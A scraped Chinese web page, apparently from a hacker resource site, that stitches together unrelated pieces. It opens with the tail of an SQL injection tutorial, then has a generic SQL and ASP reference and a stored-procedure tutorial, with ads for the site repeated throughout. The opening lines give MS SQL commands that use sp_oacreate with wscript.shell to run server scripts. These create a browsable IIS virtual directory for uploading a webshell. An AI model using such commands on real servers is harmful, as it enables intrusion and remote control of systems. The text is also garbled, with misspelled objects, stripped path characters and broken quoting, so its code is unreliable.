更多sql注入信息请关注??????????????????????37网络技术网?www.37tk.com?你黑客路上的资源站?
declare @o int exec sp_oacreate 'wscripq.shell', @o out exec sp_oamethod @o, 'run', NULL,’ cscripq.exe c:inetpubwwwrootmkwebdir.vbs -w \默认 Web 站点\\:\
在默认的WEB站点下创建一个虚拟目录E,指向E:盘下。
declare @o int exec sp_oacreate 'wscripq.shell', @o out exec sp_oamethod @o, 'run', NULL,’ cscripq.exe c:inetpubwwwrootchaccess.vbs -a w3svc/1/ROOT/e +browse’ 给虚拟目录e加上浏览属性不错吧。给自己开虚拟服务。想那些网页目录路径,头都快破了。这下给自己一个天开眼了。那传WEBSHELL利用MS SQL为我们的工作告了一段落了,接下来工作应该由你来了。
SQL语句参考及记录集对象详解
2008-11-25 11:47 作者:佚名 来源:企航中国 点击:2 次核心提示:SQL语句参考及记录集对象详解 1. ASP与Access数据库连接: 2. ASP与SQL数据库连接: 建立记录集对象: set rs=server.createobject(\语句,conn,3,2 3. SQL常用命令使用方法: (1) 数据记录筛选: sql=\SQL语句参考及记录集对象详解 1. ASP与Access数据库连接:
2. ASP与SQL数据库连接: 建立记录集对象:
set rs=server.createobject(\ rs.open SQL语句,conn,3,2 3. SQL常用命令使用方法: (1) 数据记录筛选:
sql=\数据表 where 字段名=字段值 order by 字段名 [desc]\sql=\数据表 where 字段名 like '%字段值%' order by 字段名 [desc]\
sql=\数据表 where 字段名 order by 字段名 [desc]\
更多sql注入信息请关注??????????????????????37网络技术网?www.37tk.com?你黑客路上的资源站?
sql=\数据表 where 字段名 in ('值1','值2','值3')\sql=\数据表 where 字段名 between 值1 and 值2\(2) 更新数据记录:
sql=\数据表 set 字段名=字段值 where 条件表达式\
sql=\数据表 set 字段1=值1,字段2=值2 …… 字段n=值n where 条件表达式\
(3) 删除数据记录:
sql=\数据表 where 条件表达式\sql=\数据表\将数据表所有记录删除) (4) 添加数据记录:
sql=\数据表 (字段1,字段2,字段3 …) values (值1,值2,值3 …)\sql=\目标数据表 select * from 源数据表\把源数据表的记录添加到目标数据表)
(5) 数据记录统计函数:
AVG(字段名) 得出一个表格栏平均值
COUNT(*|字段名) 对数据行数的统计或对某一栏有值的数据行数统计 MAX(字段名) 取得一个表格栏最大的值 MIN(字段名) 取得一个表格栏最小的值 SUM(字段名) 把数据栏的值相加 引用以上函数的方法:
sql=\字段名) as 别名 from 数据表 where 条件表达式\set rs=conn.excute(sql)
用 rs(\别名\获取统的计值,其它函数运用同上。 (5) 数据表的建立和删除:
CREATE TABLE 数据表名称(字段1 类型1(长度),字段2 类型2(长度) …… ) 例:CREATE TABLE tab01(name varchar(50),datetime default now()) DROP TABLE 数据表名称 (永久性删除一个数据表)
更多sql注入信息请关注??????????????????????37网络技术网?www.37tk.com?你黑客路上的资源站?
4. 记录集对象的方法:
rs.movenext 将记录指针从当前的位置向下移一行 rs.moveprevious 将记录指针从当前的位置向上移一行 rs.movefirst 将记录指针移到数据表第一行 rs.movelast 将记录指针移到数据表最后一行
原创:数据库】SQL SERVER数据库开发之存储过程应用
标 题:SQL SERVER数据库开发之存储过程的应用 作 者:栽培者 日 期:2005-12-27 说 明:由于个人能力有限,文章中难免会出现错误或遗漏的地方,敬请谅解!同时欢迎你指出,以便我能及时修改,以免误导下一个看官。最后希望本文能给你带来一定的帮助。
序
可能有不少朋友使用SQL SERVER做开发也已经有段日子,但还没有或者很少在项目中使用存储过程,或许有些朋友认为根本没有必要使用存储过程等等。其实当你一个项目做完到了维护阶段时,就会发现存储过程给我们带来了好处了,修改方便,不能去改我们的应用程序,只需要改存储过程的内容,而且还可以使我们的程序速度得到提高。
QUOTE:
SQL SERVER 联机丛书中的定义:
存储过程是保存起来的可以接受和返回用户提供的参数的 Transact-SQL 语句的集合。
可以创建一个过程供永久使用,或在一个会话中临时使用(局部临时过程),或在所有会话中临时使用(全局临时过程)。
也可以创建在 Microsoft SQL Server 启动时自动运行的存储过程。
要使用存储过程,首先我们必需熟悉一些基本的T-SQL语句,因为存储过程是由于一组T-SQL语句构成的,并且,我们需要了解一些关于函数、过程的概念,因为我们需要在应用程序中调用存储过程,就像我们调用应用程序的函数一样,不过调用的方法有些不同。
下面我们来看一下存储过程的建立和使用方法。 一、创建存储过程
和数据表一样,在使用之前我们需要创建存储过程,它的简明语法是:
更多sql注入信息请关注??????????????????????37网络技术网?www.37tk.com?你黑客路上的资源站?
QUOTE:
CREATE PROC 存储过程名称 [参数列表(多个以“,”分隔)] AS
SQL 语句 例:
QUOTE:
CREATE PROC upGetUserName @intUserId INT,
@ostrUserName NVARCHAR(20) OUTPUT -- 要输出的参数 AS BEGIN
-- 将uName的值赋给 @ostrUserName 变量,即要输出的参数
SELECT @ostrUserName=uName FROM uUser WHERE uId=@intUserId END
其中 CREATE PROC 语句(完整语句为CREATE PROCEDURE)的意思就是告诉SQL SERVER,现在需要建立一个存储过程,upGetUserName 就是存储过程名称,@intUserId 和 @ostrUserName 分别是该存储过程的两个参数,注意,在SQL SERVER中,所有用户定义的变量都以“@”开头,OUTPUT关键字表示这个参数是用来输出的,AS之后就是存储过程内容了。只要将以上代码在“查询分析器”里执行一次,SQL SERVER就会在当前数据库中创建一个名为
“upGetUserName”的存储过程。你可以打开“企业管理器”,选择当前操作的数据库,然后在左边的树型列表中选择“存储过程”,此时就可以在右边的列表中看到你刚刚创建的存储过程了(如果没有,刷新一下即可)。 二、存储过程的调用
之前我们已经创建了一个名为“upGetUserName”的存储过程,从字面理解该存储过程的功能是用来取得某一个用户的名称。存储过程建立好了,接下来就是要在应用程序里调用了,下面看一下在ASP程序里的调用。
QUOTE:
Dim adoComm
'// 创建一个对象,我们用来调用存储过程
Set adoComm = CreateObject(\With adoComm
'// 设置连接,设 adoConn 为已经连接的 ADODB.Connection 对象 .ActiveConnection = adoConn
'// 类型为存储过程,adCmdStoredProc = 4 .CommandType = 4 '// 存储过程名称
.CommandText = \ '// 设置用户编号
.Parameters.Item(\
更多sql注入信息请关注??????????????????????37网络技术网?www.37tk.com?你黑客路上的资源站?
'// 执行存储过程 .Execute
'// 取得从存储过程返回的用户名称
Response.Write \用户名:\ End With '// 释放对象
Set adoComm = Nothing
通过以上两步,我们已经可以创建和使用简单的存储过程了。下面我们来看一个稍微复杂点的存储过程,以进一步了解存储过程的应用。 三、存储过程的实际应用
用户登录在ASP项目中经常会使用到,相信很多朋友也都做过类似的系统,但使用存储过程来做验证朋友可能不多,那么我们就以它来做例子,写一个简单的用户登录验证的存储过程。
QUOTE:
CREATE PROC upUserLogin
@strLoginName NVARCHAR(20), @strLoginPwd NVARCHAR(20), @blnReturn BIT OUTPUT AS
-- 定义一个临时用来保存密码的变量 DECLARE @strPwd NVARCHAR(20) BEGIN
-- 从表中查询当前用户的密码,赋值给 @strPwd 变量,下面要对他进行比较
SELECT @strPwd=uLoginPwd FROM uUser WHERE uLoginName=@strLoginName
IF @strLoginPwd = @strPwd BEGIN
SET @blnReturn = 1
-- 更新用户最后登录时间
UPDATE uUser SET uLastLogin=GETDATE() WHERE uLoginName=@strLoginName END ELSE
SET @blnReturn = 0 END
用户登录的存储过程建立好了,现在在程序里试一下吧。注意,在一个区域内如果有多条语句时,必需使用BEGIN...END关键字。
SQL注入经典教程(珍藏版)
